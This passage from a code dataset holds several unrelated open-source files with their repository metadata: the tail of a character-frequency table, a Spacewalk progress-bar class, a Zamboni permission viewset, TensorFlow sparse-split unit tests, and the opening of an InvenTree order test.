3999, 625,4209,2273,3368,1499,4210,4000,7811,4001,4211,3222,2274,2275,3476,7812, # 6662
7813,2764, 808,2606,3699,3369,4002,4212,3100,2532, 526,3370,3821,4213, 955,7814, # 6678
1620,4214,2637,2427,7815,1429,3700,1669,1831, 994, 928,7816,3578,1260,7817,7818, # 6694
7819,1948,2288, 741,2919,1626,4215,2729,2455, 867,1184, 362,3371,1392,7820,7821, # 6710
4003,4216,1770,1736,3223,2920,4499,4500,1928,2698,1459,1158,7822,3050,3372,2877, # 6726
1292,1929,2506,2842,3701,1985,1187,2071,2014,2607,4217,7823,2566,2507,2169,3702, # 6742
2483,3299,7824,3703,4501,7825,7826, 666,1003,3005,1022,3579,4218,7827,4502,1813, # 6758
2253, 574,3822,1603, 295,1535, 705,3823,4219, 283, 858, 417,7828,7829,3224,4503, # 6774
4504,3051,1220,1889,1046,2276,2456,4004,1393,1599, 689,2567, 388,4220,7830,2484, # 6790
802,7831,2798,3824,2060,1405,2254,7832,4505,3825,2109,1052,1345,3225,1585,7833, # 6806
809,7834,7835,7836, 575,2730,3477, 956,1552,1469,1144,2323,7837,2324,1560,2457, # 6822
3580,3226,4005, 616,2207,3155,2180,2289,7838,1832,7839,3478,4506,7840,1319,3704, # 6838
3705,1211,3581,1023,3227,1293,2799,7841,7842,7843,3826, 607,2306,3827, 762,2878, # 6854
1439,4221,1360,7844,1485,3052,7845,4507,1038,4222,1450,2061,2638,4223,1379,4508, # 6870
2585,7846,7847,4224,1352,1414,2325,2921,1172,7848,7849,3828,3829,7850,1797,1451, # 6886
7851,7852,7853,7854,2922,4006,4007,2485,2346, 411,4008,4009,3582,3300,3101,4509, # 6902
1561,2664,1452,4010,1375,7855,7856, 47,2959, 316,7857,1406,1591,2923,3156,7858, # 6918
1025,2141,3102,3157, 354,2731, 884,2224,4225,2407, 508,3706, 726,3583, 996,2428, # 6934
3584, 729,7859, 392,2191,1453,4011,4510,3707,7860,7861,2458,3585,2608,1675,2800, # 6950
919,2347,2960,2348,1270,4511,4012, 73,7862,7863, 647,7864,3228,2843,2255,1550, # 6966
1346,3006,7865,1332, 883,3479,7866,7867,7868,7869,3301,2765,7870,1212, 831,1347, # 6982
4226,4512,2326,3830,1863,3053, 720,3831,4513,4514,3832,7871,4227,7872,7873,4515, # 6998
7874,7875,1798,4516,3708,2609,4517,3586,1645,2371,7876,7877,2924, 669,2208,2665, # 7014
2429,7878,2879,7879,7880,1028,3229,7881,4228,2408,7882,2256,1353,7883,7884,4518, # 7030
3158, 518,7885,4013,7886,4229,1960,7887,2142,4230,7888,7889,3007,2349,2350,3833, # 7046
516,1833,1454,4014,2699,4231,4519,2225,2610,1971,1129,3587,7890,2766,7891,2961, # 7062
1422, 577,1470,3008,1524,3373,7892,7893, 432,4232,3054,3480,7894,2586,1455,2508, # 7078
2226,1972,1175,7895,1020,2732,4015,3481,4520,7896,2733,7897,1743,1361,3055,3482, # 7094
2639,4016,4233,4521,2290, 895, 924,4234,2170, 331,2243,3056, 166,1627,3057,1098, # 7110
7898,1232,2880,2227,3374,4522, 657, 403,1196,2372, 542,3709,3375,1600,4235,3483, # 7126
7899,4523,2767,3230, 576, 530,1362,7900,4524,2533,2666,3710,4017,7901, 842,3834, # 7142
7902,2801,2031,1014,4018, 213,2700,3376, 665, 621,4236,7903,3711,2925,2430,7904, # 7158
2431,3302,3588,3377,7905,4237,2534,4238,4525,3589,1682,4239,3484,1380,7906, 724, # 7174
2277, 600,1670,7907,1337,1233,4526,3103,2244,7908,1621,4527,7909, 651,4240,7910, # 7190
1612,4241,2611,7911,2844,7912,2734,2307,3058,7913, 716,2459,3059, 174,1255,2701, # 7206
4019,3590, 548,1320,1398, 728,4020,1574,7914,1890,1197,3060,4021,7915,3061,3062, # 7222
3712,3591,3713, 747,7916, 635,4242,4528,7917,7918,7919,4243,7920,7921,4529,7922, # 7238
3378,4530,2432, 451,7923,3714,2535,2072,4244,2735,4245,4022,7924,1764,4531,7925, # 7254
4246, 350,7926,2278,2390,2486,7927,4247,4023,2245,1434,4024, 488,4532, 458,4248, # 7270
4025,3715, 771,1330,2391,3835,2568,3159,2159,2409,1553,2667,3160,4249,7928,2487, # 7286
2881,2612,1720,2702,4250,3379,4533,7929,2536,4251,7930,3231,4252,2768,7931,2015, # 7302
2736,7932,1155,1017,3716,3836,7933,3303,2308, 201,1864,4253,1430,7934,4026,7935, # 7318
7936,7937,7938,7939,4254,1604,7940, 414,1865, 371,2587,4534,4535,3485,2016,3104, # 7334
4536,1708, 960,4255, 887, 389,2171,1536,1663,1721,7941,2228,4027,2351,2926,1580, # 7350
7942,7943,7944,1744,7945,2537,4537,4538,7946,4539,7947,2073,7948,7949,3592,3380, # 7366
2882,4256,7950,4257,2640,3381,2802, 673,2703,2460, 709,3486,4028,3593,4258,7951, # 7382
1148, 502, 634,7952,7953,1204,4540,3594,1575,4541,2613,3717,7954,3718,3105, 948, # 7398
3232, 121,1745,3837,1110,7955,4259,3063,2509,3009,4029,3719,1151,1771,3838,1488, # 7414
4030,1986,7956,2433,3487,7957,7958,2093,7959,4260,3839,1213,1407,2803, 531,2737, # 7430
2538,3233,1011,1537,7960,2769,4261,3106,1061,7961,3720,3721,1866,2883,7962,2017, # 7446
120,4262,4263,2062,3595,3234,2309,3840,2668,3382,1954,4542,7963,7964,3488,1047, # 7462
2704,1266,7965,1368,4543,2845, 649,3383,3841,2539,2738,1102,2846,2669,7966,7967, # 7478
1999,7968,1111,3596,2962,7969,2488,3842,3597,2804,1854,3384,3722,7970,7971,3385, # 7494
2410,2884,3304,3235,3598,7972,2569,7973,3599,2805,4031,1460, 856,7974,3600,7975, # 7510
2885,2963,7976,2886,3843,7977,4264, 632,2510, 875,3844,1697,3845,2291,7978,7979, # 7526
4544,3010,1239, 580,4545,4265,7980, 914, 936,2074,1190,4032,1039,2123,7981,7982, # 7542
7983,3386,1473,7984,1354,4266,3846,7985,2172,3064,4033, 915,3305,4267,4268,3306, # 7558
1605,1834,7986,2739, 398,3601,4269,3847,4034, 328,1912,2847,4035,3848,1331,4270, # 7574
3011, 937,4271,7987,3602,4036,4037,3387,2160,4546,3388, 524, 742, 538,3065,1012, # 7590
7988,7989,3849,2461,7990, 658,1103, 225,3850,7991,7992,4547,7993,4548,7994,3236, # 7606
1243,7995,4038, 963,2246,4549,7996,2705,3603,3161,7997,7998,2588,2327,7999,4550, # 7622
8000,8001,8002,3489,3307, 957,3389,2540,2032,1930,2927,2462, 870,2018,3604,1746, # 7638
2770,2771,2434,2463,8003,3851,8004,3723,3107,3724,3490,3390,3725,8005,1179,3066, # 7654
8006,3162,2373,4272,3726,2541,3163,3108,2740,4039,8007,3391,1556,2542,2292, 977, # 7670
2887,2033,4040,1205,3392,8008,1765,3393,3164,2124,1271,1689, 714,4551,3491,8009, # 7686
2328,3852, 533,4273,3605,2181, 617,8010,2464,3308,3492,2310,8011,8012,3165,8013, # 7702
8014,3853,1987, 618, 427,2641,3493,3394,8015,8016,1244,1690,8017,2806,4274,4552, # 7718
8018,3494,8019,8020,2279,1576, 473,3606,4275,3395, 972,8021,3607,8022,3067,8023, # 7734
8024,4553,4554,8025,3727,4041,4042,8026, 153,4555, 356,8027,1891,2888,4276,2143, # 7750
408, 803,2352,8028,3854,8029,4277,1646,2570,2511,4556,4557,3855,8030,3856,4278, # 7766
8031,2411,3396, 752,8032,8033,1961,2964,8034, 746,3012,2465,8035,4279,3728, 698, # 7782
4558,1892,4280,3608,2543,4559,3609,3857,8036,3166,3397,8037,1823,1302,4043,2706, # 7798
3858,1973,4281,8038,4282,3167, 823,1303,1288,1236,2848,3495,4044,3398, 774,3859, # 7814
8039,1581,4560,1304,2849,3860,4561,8040,2435,2161,1083,3237,4283,4045,4284, 344, # 7830
1173, 288,2311, 454,1683,8041,8042,1461,4562,4046,2589,8043,8044,4563, 985, 894, # 7846
8045,3399,3168,8046,1913,2928,3729,1988,8047,2110,1974,8048,4047,8049,2571,1194, # 7862
425,8050,4564,3169,1245,3730,4285,8051,8052,2850,8053, 636,4565,1855,3861, 760, # 7878
1799,8054,4286,2209,1508,4566,4048,1893,1684,2293,8055,8056,8057,4287,4288,2210, # 7894
479,8058,8059, 832,8060,4049,2489,8061,2965,2490,3731, 990,3109, 627,1814,2642, # 7910
4289,1582,4290,2125,2111,3496,4567,8062, 799,4291,3170,8063,4568,2112,1737,3013, # 7926
1018, 543, 754,4292,3309,1676,4569,4570,4050,8064,1489,8065,3497,8066,2614,2889, # 7942
4051,8067,8068,2966,8069,8070,8071,8072,3171,4571,4572,2182,1722,8073,3238,3239, # 7958
1842,3610,1715, 481, 365,1975,1856,8074,8075,1962,2491,4573,8076,2126,3611,3240, # 7974
433,1894,2063,2075,8077, 602,2741,8078,8079,8080,8081,8082,3014,1628,3400,8083, # 7990
3172,4574,4052,2890,4575,2512,8084,2544,2772,8085,8086,8087,3310,4576,2891,8088, # 8006
4577,8089,2851,4578,4579,1221,2967,4053,2513,8090,8091,8092,1867,1989,8093,8094, # 8022
8095,1895,8096,8097,4580,1896,4054, 318,8098,2094,4055,4293,8099,8100, 485,8101, # 8038
938,3862, 553,2670, 116,8102,3863,3612,8103,3498,2671,2773,3401,3311,2807,8104, # 8054
3613,2929,4056,1747,2930,2968,8105,8106, 207,8107,8108,2672,4581,2514,8109,3015, # 8070
890,3614,3864,8110,1877,3732,3402,8111,2183,2353,3403,1652,8112,8113,8114, 941, # 8086
2294, 208,3499,4057,2019, 330,4294,3865,2892,2492,3733,4295,8115,8116,8117,8118, # 8102
#Everything below is of no interest for detection purpose
2515,1613,4582,8119,3312,3866,2516,8120,4058,8121,1637,4059,2466,4583,3867,8122, # 8118
2493,3016,3734,8123,8124,2192,8125,8126,2162,8127,8128,8129,8130,8131,8132,8133, # 8134
8134,8135,8136,8137,8138,8139,8140,8141,8142,8143,8144,8145,8146,8147,8148,8149, # 8150
8150,8151,8152,8153,8154,8155,8156,8157,8158,8159,8160,8161,8162,8163,8164,8165, # 8166
8166,8167,8168,8169,8170,8171,8172,8173,8174,8175,8176,8177,8178,8179,8180,8181, # 8182
8182,8183,8184,8185,8186,8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197, # 8198
8198,8199,8200,8201,8202,8203,8204,8205,8206,8207,8208,8209,8210,8211,8212,8213, # 8214
8214,8215,8216,8217,8218,8219,8220,8221,8222,8223,8224,8225,8226,8227,8228,8229, # 8230
8230,8231,8232,8233,8234,8235,8236,8237,8238,8239,8240,8241,8242,8243,8244,8245, # 8246
8246,8247,8248,8249,8250,8251,8252,8253,8254,8255,8256,8257,8258,8259,8260,8261, # 8262
8262,8263,8264,8265,8266,8267,8268,8269,8270,8271,8272,8273,8274,8275,8276,8277, # 8278
8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,8288,8289,8290,8291,8292,8293, # 8294
8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,8304,8305,8306,8307,8308,8309, # 8310
8310,8311,8312,8313,8314,8315,8316,8317,8318,8319,8320,8321,8322,8323,8324,8325, # 8326
8326,8327,8328,8329,8330,8331,8332,8333,8334,8335,8336,8337,8338,8339,8340,8341, # 8342
8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,8352,8353,8354,8355,8356,8357, # 8358
8358,8359,8360,8361,8362,8363,8364,8365,8366,8367,8368,8369,8370,8371,8372,8373, # 8374
8374,8375,8376,8377,8378,8379,8380,8381,8382,8383,8384,8385,8386,8387,8388,8389, # 8390
8390,8391,8392,8393,8394,8395,8396,8397,8398,8399,8400,8401,8402,8403,8404,8405, # 8406
8406,8407,8408,8409,8410,8411,8412,8413,8414,8415,8416,8417,8418,8419,8420,8421, # 8422
8422,8423,8424,8425,8426,8427,8428,8429,8430,8431,8432,8433,8434,8435,8436,8437, # 8438
8438,8439,8440,8441,8442,8443,8444,8445,8446,8447,8448,8449,8450,8451,8452,8453, # 8454
8454,8455,8456,8457,8458,8459,8460,8461,8462,8463,8464,8465,8466,8467,8468,8469, # 8470
8470,8471,8472,8473,8474,8475,8476,8477,8478,8479,8480,8481,8482,8483,8484,8485, # 8486
8486,8487,8488,8489,8490,8491,8492,8493,8494,8495,8496,8497,8498,8499,8500,8501, # 8502
8502,8503,8504,8505,8506,8507,8508,8509,8510,8511,8512,8513,8514,8515,8516,8517, # 8518
8518,8519,8520,8521,8522,8523,8524,8525,8526,8527,8528,8529,8530,8531,8532,8533, # 8534
8534,8535,8536,8537,8538,8539,8540,8541,8542,8543,8544,8545,8546,8547,8548,8549, # 8550
8550,8551,8552,8553,8554,8555,8556,8557,8558,8559,8560,8561,8562,8563,8564,8565, # 8566
8566,8567,8568,8569,8570,8571,8572,8573,8574,8575,8576,8577,8578,8579,8580,8581, # 8582
8582,8583,8584,8585,8586,8587,8588,8589,8590,8591,8592,8593,8594,8595,8596,8597, # 8598
8598,8599,8600,8601,8602,8603,8604,8605,8606,8607,8608,8609,8610,8611,8612,8613, # 8614
8614,8615,8616,8617,8618,8619,8620,8621,8622,8623,8624,8625,8626,8627,8628,8629, # 8630
8630,8631,8632,8633,8634,8635,8636,8637,8638,8639,8640,8641,8642,8643,8644,8645, # 8646
8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,8656,8657,8658,8659,8660,8661, # 8662
8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,8672,8673,8674,8675,8676,8677, # 8678
8678,8679,8680,8681,8682,8683,8684,8685,8686,8687,8688,8689,8690,8691,8692,8693, # 8694
8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,8704,8705,8706,8707,8708,8709, # 8710
8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,8720,8721,8722,8723,8724,8725, # 8726
8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,8736,8737,8738,8739,8740,8741) # 8742
# flake8: noqa
| mit |
mcalmer/spacewalk | backend/satellite_tools/progress_bar.py | 10 | 4321 | #
# Copyright (c) 2008--2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import sys
import time
class ProgressBar:
"""A simplete progress bar class. See example in main below."""
def __init__(self, prompt='working: ', endTag=' - done',
finalSize=100.0, finalBarLength=10,
barChar='#', stream=sys.stdout, redrawYN=1):
# disabling redrawing of the hash marks. Too many people are
# complaining.
redrawYN = 0
self.size = 0.0
self.barLength = 0
self.barLengthPrinted = 0
self.prompt = prompt
self.endTag = endTag
self.finalSize = float(finalSize)
self.finalBarLength = int(finalBarLength)
self.barChar = barChar
self.stream = stream
self.redrawYN = redrawYN
if self.stream not in [sys.stdout, sys.stderr]:
self.redrawYN = 0
def reinit(self):
self.size = 0.0
self.barLength = 0
self.barLengthPrinted = 0
def printAll(self, contextYN=0):
""" Prints/reprints the prompt and current level of hashmarks.
Eg: ____________________
Processing: ###########
NOTE: The underscores only occur if you turn on contextYN.
"""
if contextYN:
self.stream.write('%s%s\n' % (' ' * len(self.prompt), '_' * self.finalBarLength))
toPrint = self.prompt + self.barChar * self.barLength
if self.redrawYN:
# self.stream.write('\b'*len(toPrint))
# backup
self.stream.write('\b' * 80) # nuke whole line (80 good 'nuf?)
completeBar = len(self.prompt + self.endTag) + self.finalBarLength
# erase
self.stream.write(completeBar * ' ')
# backup again
self.stream.write(completeBar * '\b')
self.stream.write(toPrint)
self.stream.flush()
self.barLengthPrinted = self.barLength
def printIncrement(self):
"visually updates the bar."
if self.redrawYN:
self.printAll(contextYN=0)
else:
self.stream.write(self.barChar * (self.barLength - self.barLengthPrinted))
self.stream.flush()
self.barLengthPrinted = self.barLength
def printComplete(self):
"""Completes the bar reguardless of current object status (and then
updates the object's status to complete)."""
self.complete()
self.printIncrement()
self.stream.write(self.endTag + '\n')
self.stream.flush()
def update(self, newSize):
"Update the status of the class to the newSize of the bar."
newSize = float(newSize)
if newSize >= self.finalSize:
newSize = self.finalSize
self.size = newSize
if self.finalSize == 0:
self.barLength = self.finalBarLength
else:
self.barLength = int((self.size * self.finalBarLength) / self.finalSize)
if self.barLength >= self.finalBarLength:
self.barLength = self.finalBarLength
def addTo(self, additionalSize):
"Update the object's status to an additional bar size."
self.update(self.size + additionalSize)
def complete(self):
self.update(self.finalSize)
#------------------------------------------------------------------------------
if __name__ == '__main__':
print("An example:")
bar_length = 40
items = 200
pb = ProgressBar('standby: ', ' - all done!', items, bar_length, 'o')
pb.printAll(1)
for i in range(items):
# pb.update(i)
pb.addTo(1)
time.sleep(0.005)
pb.printIncrement()
pb.printComplete()
#------------------------------------------------------------------------------
| gpl-2.0 |
mozilla/zamboni | mkt/operators/views.py | 6 | 1262 | from rest_framework import mixins, response, status, viewsets
from mkt.access import acl
from mkt.api.base import CORSMixin
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.users.models import UserProfile
from .models import OperatorPermission
from .serializers import OperatorPermissionSerializer
class OperatorPermissionViewSet(CORSMixin, mixins.ListModelMixin,
viewsets.GenericViewSet):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
cors_allowed_methods = ('GET',)
queryset = OperatorPermission.objects.all()
permission_classes = []
serializer_class = OperatorPermissionSerializer
def get_queryset(self):
if isinstance(self.request.user, UserProfile):
return self.queryset.filter(user=self.request.user)
return self.queryset.none()
def list(self, request, *args, **kwargs):
if acl.action_allowed(request, 'OperatorDashboard', '*'):
return response.Response(['*'], status=status.HTTP_200_OK)
return super(OperatorPermissionViewSet, self).list(
request, *args, **kwargs)
| bsd-3-clause |
awni/tensorflow | tensorflow/python/kernel_tests/sparse_split_op_test.py | 15 | 12538 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SparseReorder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class SparseSplitOpTest(tf.test.TestCase):
def _SparseTensor_4x6(self):
# [0 | |2 | |4 |5 ]
# [ |11| |13|14| ]
# [20| | |23| |25]
# [30| |32|33| |35]
ind = np.array(
[[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4], [2, 0], [2, 3],
[2, 5], [3, 0], [3, 2], [3, 3], [3, 5]]).astype(np.int64)
val = np.array([0, 2, 4, 5, 11, 13, 14, 20, 23, 25, 30, 32, 33, 35]).astype(
np.int64)
shape = np.array([4, 6]).astype(np.int64)
return tf.SparseTensor(ind, val, shape)
def _SparseTensor_5x7(self):
# [0 | |2 | |4 |5 | ]
# [ |11| |13|14| |16]
# [20| | |23| |25| ]
# [30| |32|33| |35| ]
# [ |41| | |44| |46]
ind = np.array([
[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1, 4], [1, 6], [2, 0],
[2, 3], [2, 5], [3, 0], [3, 2], [3, 3], [3, 5], [4, 1], [4, 4], [4, 6]
]).astype(np.int64)
val = np.array([0, 2, 4, 5, 11, 13, 14, 16, 20, 23, 25, 30, 32, 33, 35, 41,
44, 46]).astype(np.int64)
shape = np.array([5, 7]).astype(np.int64)
return tf.SparseTensor(ind, val, shape)
def _SparseTensor_3x4x2(self):
# slice(:,:, 0)
# ['a0'| |'b0'| ]
# [ |'c0'| |'d0']
# [ | |'e0'| ]
# slice(:,:, 1)
# ['a1'| |'b1'| ]
# [ |'c1'| |'d1']
# [ | |'e1'| ]
ind = np.array([[0, 0, 0], [0, 0, 1], [0, 2, 0], [0, 2, 1],
[1, 1, 0], [1, 1, 1], [1, 3, 0], [1, 3, 1],
[2, 2, 0], [2, 2, 1]]).astype(np.int64)
val = np.array(['a0', 'a1', 'b0', 'b1', 'c0', 'c1', 'd0', 'd1', 'e0', 'e1'])
shape = np.array([3, 4, 2]).astype(np.int64)
return tf.SparseTensor(ind, val, shape)
def testSplitMatrixRows(self):
with self.test_session(use_gpu=False):
sp_tensors = tf.sparse_split(0, 2, self._SparseTensor_4x6())
self.assertAllEqual(len(sp_tensors), 2)
self.assertAllEqual(sp_tensors[0].indices.eval(),
[[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3], [1,
4]])
self.assertAllEqual(sp_tensors[0].values.eval(), [0, 2, 4, 5, 11, 13, 14])
self.assertAllEqual(sp_tensors[0].shape.eval(), [2, 6])
self.assertAllEqual(sp_tensors[1].indices.eval(),
[[0, 0], [0, 3], [0, 5], [1, 0], [1, 2], [1, 3], [1,
5]])
self.assertAllEqual(sp_tensors[1].values.eval(), [20, 23, 25, 30, 32, 33,
35])
self.assertAllEqual(sp_tensors[1].shape.eval(), [2, 6])
def testSplitMatrixUnevenCols(self):
with self.test_session(use_gpu=False):
sp_tensors_3 = tf.sparse_split(1, 3, self._SparseTensor_5x7())
self.assertAllEqual(len(sp_tensors_3), 3)
self.assertAllEqual(sp_tensors_3[0].indices.eval(),
[[0, 0], [0, 2], [1, 1], [2, 0], [3, 0], [3, 2],
[4, 1]])
self.assertAllEqual(sp_tensors_3[0].values.eval(), [0, 2, 11, 20, 30, 32,
41])
self.assertAllEqual(sp_tensors_3[0].shape.eval(), [5, 3])
self.assertAllEqual(sp_tensors_3[1].indices.eval(), [[0, 1], [1, 0],
[1, 1], [2, 0],
[3, 0], [4, 1]])
self.assertAllEqual(sp_tensors_3[1].values.eval(), [4, 13, 14, 23, 33,
44])
self.assertAllEqual(sp_tensors_3[1].shape.eval(), [5, 2])
self.assertAllEqual(sp_tensors_3[2].indices.eval(), [[0, 0], [1, 1],
[2, 0], [3, 0],
[4, 1]])
self.assertAllEqual(sp_tensors_3[2].values.eval(), [5, 16, 25, 35, 46])
self.assertAllEqual(sp_tensors_3[2].shape.eval(), [5, 2])
sp_tensors_4 = tf.sparse_split(1, 4, self._SparseTensor_5x7())
self.assertAllEqual(len(sp_tensors_4), 4)
self.assertAllEqual(sp_tensors_4[0].indices.eval(),
[[0, 0], [1, 1], [2, 0], [3, 0], [4, 1]])
self.assertAllEqual(sp_tensors_4[0].values.eval(), [0, 11, 20, 30, 41])
self.assertAllEqual(sp_tensors_4[0].shape.eval(), [5, 2])
self.assertAllEqual(sp_tensors_4[1].indices.eval(),
[[0, 0], [1, 1], [2, 1], [3, 0], [3, 1]])
self.assertAllEqual(sp_tensors_4[1].values.eval(), [2, 13, 23, 32, 33])
self.assertAllEqual(sp_tensors_4[1].shape.eval(), [5, 2])
self.assertAllEqual(sp_tensors_4[2].indices.eval(),
[[0, 0], [0, 1], [1, 0], [2, 1], [3, 1], [4, 0]])
self.assertAllEqual(sp_tensors_4[2].values.eval(), [4, 5, 14, 25, 35, 44])
self.assertAllEqual(sp_tensors_4[2].shape.eval(), [5, 2])
self.assertAllEqual(sp_tensors_4[3].indices.eval(), [[1, 0], [4, 0]])
self.assertAllEqual(sp_tensors_4[3].values.eval(), [16, 46])
self.assertAllEqual(sp_tensors_4[3].shape.eval(), [5, 1])
def testSplitMatrixUnevenRows(self):
with self.test_session(use_gpu=False):
sp_tensors_2 = tf.sparse_split(0, 2, self._SparseTensor_5x7())
self.assertAllEqual(sp_tensors_2[0].indices.eval(),
[[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3],
[1, 4], [1, 6], [2, 0], [2, 3], [2, 5]])
self.assertAllEqual(sp_tensors_2[0].values.eval(), [0, 2, 4, 5, 11, 13,
14, 16, 20, 23, 25])
self.assertAllEqual(sp_tensors_2[0].shape.eval(), [3, 7])
self.assertAllEqual(sp_tensors_2[1].indices.eval(),
[[0, 0], [0, 2], [0, 3], [0, 5], [1, 1], [1, 4],
[1, 6]])
self.assertAllEqual(sp_tensors_2[1].values.eval(), [30, 32, 33, 35, 41,
44, 46])
self.assertAllEqual(sp_tensors_2[1].shape.eval(), [2, 7])
self.assertAllEqual(len(sp_tensors_2), 2)
sp_tensors_3 = tf.sparse_split(0, 3, self._SparseTensor_5x7())
self.assertAllEqual(len(sp_tensors_3), 3)
self.assertAllEqual(sp_tensors_3[0].indices.eval(),
[[0, 0], [0, 2], [0, 4], [0, 5], [1, 1], [1, 3],
[1, 4], [1, 6]])
self.assertAllEqual(sp_tensors_3[0].values.eval(), [0, 2, 4, 5, 11, 13,
14, 16])
self.assertAllEqual(sp_tensors_3[0].shape.eval(), [2, 7])
self.assertAllEqual(sp_tensors_3[1].values.eval(), [20, 23, 25, 30, 32,
33, 35])
self.assertAllEqual(sp_tensors_3[1].shape.eval(), [2, 7])
self.assertAllEqual(sp_tensors_3[2].indices.eval(), [[0, 1], [0, 4],
[0, 6]])
self.assertAllEqual(sp_tensors_3[2].values.eval(), [41, 44, 46])
self.assertAllEqual(sp_tensors_3[2].shape.eval(), [1, 7])
return
def testSplitAllRows(self):
with self.test_session(use_gpu=False):
sp_tensors = tf.sparse_split(0, 4, self._SparseTensor_4x6())
self.assertAllEqual(len(sp_tensors), 4)
self.assertAllEqual(sp_tensors[0].indices.eval(), [[0, 0], [0, 2], [0, 4],
[0, 5]])
self.assertAllEqual(sp_tensors[0].values.eval(), [0, 2, 4, 5])
self.assertAllEqual(sp_tensors[0].shape.eval(), [1, 6])
self.assertAllEqual(sp_tensors[1].indices.eval(), [[0, 1], [0, 3], [0,
4]])
self.assertAllEqual(sp_tensors[1].values.eval(), [11, 13, 14])
self.assertAllEqual(sp_tensors[1].shape.eval(), [1, 6])
self.assertAllEqual(sp_tensors[2].indices.eval(), [[0, 0], [0, 3], [0,
5]])
self.assertAllEqual(sp_tensors[2].values.eval(), [20, 23, 25])
self.assertAllEqual(sp_tensors[2].shape.eval(), [1, 6])
self.assertAllEqual(sp_tensors[3].indices.eval(), [[0, 0], [0, 2], [0, 3],
[0, 5]])
self.assertAllEqual(sp_tensors[3].values.eval(), [30, 32, 33, 35])
self.assertAllEqual(sp_tensors[3].shape.eval(), [1, 6])
def testSplitColumns(self):
with self.test_session(use_gpu=False):
sparse_tensors = tf.sparse_split(1, 3, self._SparseTensor_4x6())
self.assertAllEqual(len(sparse_tensors), 3)
self.assertAllEqual(sparse_tensors[0].indices.eval(), [[0, 0], [1, 1],
[2, 0], [3, 0]])
self.assertAllEqual(sparse_tensors[0].values.eval(), [0, 11, 20, 30])
self.assertAllEqual(sparse_tensors[0].shape.eval(), [4, 2])
self.assertAllEqual(sparse_tensors[1].indices.eval(),
[[0, 0], [1, 1], [2, 1], [3, 0], [3, 1]])
self.assertAllEqual(sparse_tensors[1].values.eval(), [2, 13, 23, 32, 33])
self.assertAllEqual(sparse_tensors[1].shape.eval(), [4, 2])
self.assertAllEqual(sparse_tensors[2].indices.eval(),
[[0, 0], [0, 1], [1, 0], [2, 1], [3, 1]])
self.assertAllEqual(sparse_tensors[2].values.eval(), [4, 5, 14, 25, 35])
self.assertAllEqual(sparse_tensors[2].shape.eval(), [4, 2])
def testSplitAllColumns(self):
with self.test_session(use_gpu=False):
sparse_tensors = tf.sparse_split(1, 6, self._SparseTensor_4x6())
self.assertAllEqual(len(sparse_tensors), 6)
self.assertAllEqual(sparse_tensors[0].indices.eval(), [[0, 0], [2, 0],
[3, 0]])
self.assertAllEqual(sparse_tensors[0].values.eval(), [0, 20, 30])
self.assertAllEqual(sparse_tensors[0].shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensors[1].indices.eval(), [[1, 0]])
self.assertAllEqual(sparse_tensors[1].values.eval(), [11])
self.assertAllEqual(sparse_tensors[1].shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensors[2].indices.eval(), [[0, 0], [3, 0]])
self.assertAllEqual(sparse_tensors[2].values.eval(), [2, 32])
self.assertAllEqual(sparse_tensors[2].shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensors[3].indices.eval(), [[1, 0], [2, 0],
[3, 0]])
self.assertAllEqual(sparse_tensors[3].shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensors[3].values.eval(), [13, 23, 33])
self.assertAllEqual(sparse_tensors[4].indices.eval(), [[0, 0], [1, 0]])
self.assertAllEqual(sparse_tensors[4].values.eval(), [4, 14])
self.assertAllEqual(sparse_tensors[4].shape.eval(), [4, 1])
self.assertAllEqual(sparse_tensors[5].indices.eval(), [[0, 0], [2, 0],
[3, 0]])
self.assertAllEqual(sparse_tensors[5].values.eval(), [5, 25, 35])
self.assertAllEqual(sparse_tensors[5].shape.eval(), [4, 1])
def testSliceConcat(self):
with self.test_session(use_gpu=False):
sparse_tensors = tf.sparse_split(1, 2, self._SparseTensor_3x4x2())
concat_tensor = tf.sparse_concat(1, sparse_tensors)
expected_output = self._SparseTensor_3x4x2()
self.assertAllEqual(concat_tensor.indices.eval(),
expected_output.indices.eval())
if __name__ == '__main__':
tf.test.main()
| apache-2.0 |
SchrodingersGat/InvenTree | InvenTree/order/tests.py | 2 | 6307 | # -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from django.test import TestCase
import django.core.exceptions as django_exceptions
from part.models import Part
from .models import PurchaseOrder, PurchaseOrderLineItem
from stock.models import StockLocation
from company.models import SupplierPart
from InvenTree.status_codes import PurchaseOrderStatus
class OrderTest(TestCase):
"""
Tests to ensure that the order models are functioning correctly.
"""
fixtures = [
'company',
'supplier_part',
'price_breaks',
'category',
'part',
'location',
